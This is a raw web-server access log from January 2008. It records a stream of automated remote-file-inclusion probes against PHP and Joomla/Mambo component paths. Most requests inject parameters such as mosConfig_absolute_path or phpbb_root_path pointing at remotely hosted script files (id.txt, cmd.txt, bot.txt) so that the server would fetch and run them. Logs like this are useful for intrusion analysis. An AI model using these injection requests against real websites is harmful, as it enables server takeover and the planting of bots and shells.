218.188.2.141 - - [22/Jan/2008:04:36:18 -0800] "GET /logs/access.log//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:04:36:19 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:04:36:19 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.50.9.32 - - [22/Jan/2008:04:36:30 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.9.32 - - [22/Jan/2008:04:36:31 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:36:47 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:36:48 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:04:37:56 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:04:37:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:38:03 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:39:15 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:19 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:19 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:19 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:47 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:39:48 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:40:48 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:40:56 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:41:56 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:41:57 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:42:12 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:16 -0800] "GET /logs/access_071229.log//index.php?lang=en&cat=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:16 -0800] "GET //index.php?lang=en&cat=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:17 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:22 -0800] "GET /logs//index.php?lang=en&cat=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:24 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:44:25 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:44:54 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:44:54 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:44:55 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:04:45:28 -0800] "GET /logs/access.log/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:04:45:29 -0800] "GET /modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:04:45:30 -0800] "GET /logs/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.31.64.178 - - [22/Jan/2008:04:45:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:46:04 -0800] "GET /logs/access_071229.log//index.php?lang=en&page=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:46:06 -0800] "GET //index.php?lang=en&page=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:46:06 -0800] "GET /logs//index.php?lang=en&page=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:18 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:18 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:19 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:19 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:04:46:20 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.239.18 - - [22/Jan/2008:04:47:37 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.239.18 - - [22/Jan/2008:04:47:38 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:48:20 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:04:48:22 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.156 - - [22/Jan/2008:04:48:38 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.31.64.178 - - [22/Jan/2008:04:49:19 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [22/Jan/2008:04:49:20 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [22/Jan/2008:04:49:21 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:52:16 -0800] "GET //index.php?lang=en&cat=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:52:49 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:52:55 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:52:55 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:53:21 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:53:21 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:54:07 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:54:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:54:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:04:55:23 -0800] "GET //index.php?lang=en&page=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:04:56:26 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:04:56:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:04:56:33 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:59:12 -0800] "GET /logs/access_071212.log/modules/My_eGallery/index.php?basepath=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.213 - - [22/Jan/2008:05:01:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.213 - - [22/Jan/2008:05:01:19 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:05:03:28 -0800] "GET /logs/access.log/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:05:03:29 -0800] "GET /modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:05:03:30 -0800] "GET /logs/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:05:03:38 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://paginas.terra.com.br/lazer/xexmox/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:05:04:29 -0800] "GET /logs/access.log//include/write.php?dir=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:05:04:29 -0800] "GET //include/write.php?dir=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:05:04:34 -0800] "GET /logs//include/write.php?dir=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:05:07:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:05:07:05 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.80 - - [22/Jan/2008:05:07:25 -0800] "GET /minamijewelry/source_images/updated1/?D=A HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:05:07:52 -0800] "GET /tmp/mailError.log HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.9.218 - - [22/Jan/2008:05:08:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.98.2 - - [22/Jan/2008:05:09:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.37.66.135 - - [22/Jan/2008:05:10:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:05:12:24 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:05:12:25 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:12:43 -0800] "GET /logs/access_071218.log/[calendar]/ws/get_events.php?includedir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:12:43 -0800] "GET /[calendar]/ws/get_events.php?includedir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:12:44 -0800] "GET /logs/[calendar]/ws/get_events.php?includedir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:05:14:25 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:05:14:26 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:15:09 -0800] "GET /logs/access_071011.log/[calendar]/ws/get_events.php?includedir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:05:16:11 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.19.18 - - [22/Jan/2008:05:16:31 -0800] "GET /logs/access.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [22/Jan/2008:05:16:32 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [22/Jan/2008:05:16:32 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.135 - - [22/Jan/2008:05:16:38 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.geocities.com/chandramission/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.135 - - [22/Jan/2008:05:16:38 -0800] "GET //?mosConfig_absolute_path=http://www.geocities.com/chandramission/bot.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.135 - - [22/Jan/2008:05:16:38 -0800] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/chandramission/bot.txt? HTTP/1.1" 200 31259 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.23 - - [22/Jan/2008:05:16:39 -0800] "GET /tmp/sess_f69c8a839ea37f380c19e888b5f5a333 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.102.88.110 - - [22/Jan/2008:05:17:39 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.110 - - [22/Jan/2008:05:17:41 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.18 - - [22/Jan/2008:05:18:22 -0800] "GET /logs/access_071221.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.135 - - [22/Jan/2008:05:18:40 -0800] "GET /logs/access_071221.log//?mosConfig_absolute_path=http://www.geocities.com/chandramission/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:05:19:40 -0800] "GET ///amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [22/Jan/2008:05:21:12 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [22/Jan/2008:05:21:12 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.19.18 - - [22/Jan/2008:05:21:31 -0800] "GET //becommunity/community/index.php?pageurl=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.98.2 - - [22/Jan/2008:05:21:40 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.98.2 - - [22/Jan/2008:05:21:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
